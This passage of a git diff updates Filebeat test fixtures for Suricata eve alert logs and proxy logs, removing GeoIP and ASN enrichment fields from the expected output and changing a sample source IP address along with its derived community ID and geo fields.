-        "destination.geo.location.lat": 51.4964,
-        "destination.geo.location.lon": -0.1224,
         "destination.ip": "217.12.10.96",
         "event.action": "TCP_MISS",
         "event.code": "GET",
@@ -6222,16 +5697,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:23:04.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.169",
         "event.action": "TCP_SWAPFAIL_MISS",
         "event.code": "GET",
@@ -6354,16 +5819,6 @@
     },
     {
         "@timestamp": "2006-09-08T04:23:07.000Z",
-        "destination.as.number": 8190,
-        "destination.as.organization.name": "MDNX Internet Limited",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5064,
-        "destination.geo.location.lon": -0.02,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "213.160.98.169",
         "event.action": "TCP_MISS",
         "event.code": "GET",
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log
index 15d880f06302..8a2eef5d814e 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log
@@ -1 +1 @@
-{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
+{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"81.2.69.143","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"created_at":["2010_09_23"],"updated_at":["2010_09_23"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
index 3e8832cbd248..c8a797a58b83 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json
@@ -15,7 +15,7 @@
         "event.dataset": "suricata.eve",
         "event.kind": "alert",
         "event.module": "suricata",
-        "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}",
+        "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"81.2.69.143\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}",
         "event.severity": 2,
         "event.start": "2021-01-22T22:28:38.673Z",
         "event.type": [
@@ -29,7 +29,7 @@
         "log.offset": 0,
         "message": "Potentially Bad Traffic",
         "network.bytes": 1372,
-        "network.community_id": "1:/b5R3BDG/6TU2Pu+pRF8w6d1Z18=",
+        "network.community_id": "1:fmTf/MbjDMinU9coqCwDUc82LmA=",
         "network.direction": "inbound",
         "network.packets": 11,
         "network.protocol": "http",
@@ -39,23 +39,23 @@
         ],
         "related.ip": [
             "10.31.64.240",
-            "52.222.141.99"
+            "81.2.69.143"
         ],
         "rule.category": "Potentially Bad Traffic",
         "rule.id": "2100498",
         "rule.name": "GPL ATTACK_RESPONSE id check returned root",
         "service.type": "suricata",
-        "source.address": "52.222.141.99",
+        "source.address": "81.2.69.143",
         "source.bytes": 496,
-        "source.geo.city_name": "Seattle",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 47.6348,
-        "source.geo.location.lon": -122.3451,
-        "source.geo.region_iso_code": "US-WA",
-        "source.geo.region_name": "Washington",
-        "source.ip": "52.222.141.99",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.mac": "00:03:2d:3f:e5:63",
         "source.packets": 6,
         "source.port": 80,
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json
index c9878e61a1cb..209f2519e6c3 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json
@@ -2,18 +2,8 @@
     {
         "@timestamp": "2018-10-03T14:42:44.836Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.net",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -84,18 +74,8 @@
     {
         "@timestamp": "2018-10-03T16:16:26.711Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.net",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -166,18 +146,8 @@
     {
         "@timestamp": "2018-10-03T16:44:50.813Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.net",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -248,18 +218,8 @@
     {
         "@timestamp": "2018-10-03T16:45:09.267Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.org",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -330,18 +290,8 @@
     {
         "@timestamp": "2018-10-03T16:45:34.481Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.org",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -412,18 +362,8 @@
     {
         "@timestamp": "2018-10-03T17:02:38.900Z",
         "destination.address": "93.184.216.34",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
         "destination.bytes": 1654,
         "destination.domain": "example.org",
-        "destination.geo.city_name": "Norwell",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.1596,
-        "destination.geo.location.lon": -70.8217,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "93.184.216.34",
         "destination.packets": 3,
         "destination.port": 80,
@@ -494,18 +434,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.009Z",
         "destination.address": "91.189.88.152",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 1654,
         "destination.domain": "security.ubuntu.com",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5132,
-        "destination.geo.location.lon": -0.0961,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "91.189.88.152",
         "destination.packets": 3,
         "destination.port": 80,
@@ -576,18 +506,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.168Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 417,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 3,
         "destination.port": 80,
@@ -658,18 +578,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.288Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 3445,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 5,
         "destination.port": 80,
@@ -740,18 +650,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.289Z",
         "destination.address": "91.189.88.152",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 90543,
         "destination.domain": "security.ubuntu.com",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5132,
-        "destination.geo.location.lon": -0.0961,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "91.189.88.152",
         "destination.packets": 62,
         "destination.port": 80,
@@ -822,18 +722,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.356Z",
         "destination.address": "91.189.88.152",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 145014,
         "destination.domain": "security.ubuntu.com",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5132,
-        "destination.geo.location.lon": -0.0961,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "91.189.88.152",
         "destination.packets": 98,
         "destination.port": 80,
@@ -904,18 +794,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.456Z",
         "destination.address": "91.189.88.152",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 330525,
         "destination.domain": "security.ubuntu.com",
-        "destination.geo.city_name": "London",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5132,
-        "destination.geo.location.lon": -0.0961,
-        "destination.geo.region_iso_code": "GB-ENG",
-        "destination.geo.region_name": "England",
         "destination.ip": "91.189.88.152",
         "destination.packets": 221,
         "destination.port": 80,
@@ -986,18 +866,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.747Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 96554,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 67,
         "destination.port": 80,
@@ -1068,18 +938,8 @@
     {
         "@timestamp": "2018-10-04T09:34:59.953Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 174843,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 119,
         "destination.port": 80,
@@ -1150,18 +1010,8 @@
     {
         "@timestamp": "2018-10-04T09:35:00.250Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 376452,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 253,
         "destination.port": 80,
@@ -1232,18 +1082,8 @@
     {
         "@timestamp": "2018-10-04T09:35:00.401Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 468170,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 314,
         "destination.port": 80,
@@ -1314,18 +1154,8 @@
     {
         "@timestamp": "2018-10-04T09:35:00.776Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 880323,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 588,
         "destination.port": 80,
@@ -1396,18 +1226,8 @@
     {
         "@timestamp": "2018-10-04T09:35:00.897Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 884342,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 591,
         "destination.port": 80,
@@ -1478,18 +1298,8 @@
     {
         "@timestamp": "2018-10-04T09:35:01.362Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 1467603,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 979,
         "destination.port": 80,
@@ -1559,18 +1369,8 @@
     {
         "@timestamp": "2018-10-04T09:35:01.575Z",
         "destination.address": "91.189.91.23",
-        "destination.as.number": 41231,
-        "destination.as.organization.name": "Canonical Group Limited",
         "destination.bytes": 1618380,
         "destination.domain": "archive.ubuntu.com",
-        "destination.geo.city_name": "Boston",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 42.3562,
-        "destination.geo.location.lon": -71.0631,
-        "destination.geo.region_iso_code": "US-MA",
-        "destination.geo.region_name": "Massachusetts",
         "destination.ip": "91.189.91.23",
         "destination.packets": 1079,
         "destination.port": 80,
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log
index a5e1a8fbd3ec..19935d3ae4c5 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log
@@ -1 +1 @@
-{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
+{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"81.2.69.143","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}}
diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json
index a71e2a2cf675..26e66adc2cf6 100644
--- a/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json
+++ b/x-pack/filebeat/module/suricata/eve/test/eve-metadata.log-expected.json
@@ -15,7 +15,7 @@
         "event.dataset": "suricata.eve",
         "event.kind": "alert",
         "event.module": "suricata",
-        "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}",
+        "event.original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"81.2.69.143\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}",
         "event.severity": 2,
         "event.start": "2021-01-22T22:28:38.673Z",
         "event.type": [
@@ -32,7 +32,7 @@
         "log.offset": 0,
         "message": "Potentially Bad Traffic",
         "network.bytes": 1372,
-        "network.community_id": "1:/b5R3BDG/6TU2Pu+pRF8w6d1Z18=",
+        "network.community_id": "1:fmTf/MbjDMinU9coqCwDUc82LmA=",
         "network.direction": "inbound",
         "network.packets": 11,
         "network.protocol": "http",
@@ -42,23 +42,23 @@
         ],
         "related.ip": [
             "10.31.64.240",
-            "52.222.141.99"
+            "81.2.69.143"
         ],
         "rule.category": "Potentially Bad Traffic",
         "rule.id": "2100498",
         "rule.name": "GPL ATTACK_RESPONSE id check returned root",
         "service.type": "suricata",
-        "source.address": "52.222.141.99",
+        "source.address": "81.2.69.143",
         "source.bytes": 496,
-        "source.geo.city_name": "Seattle",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
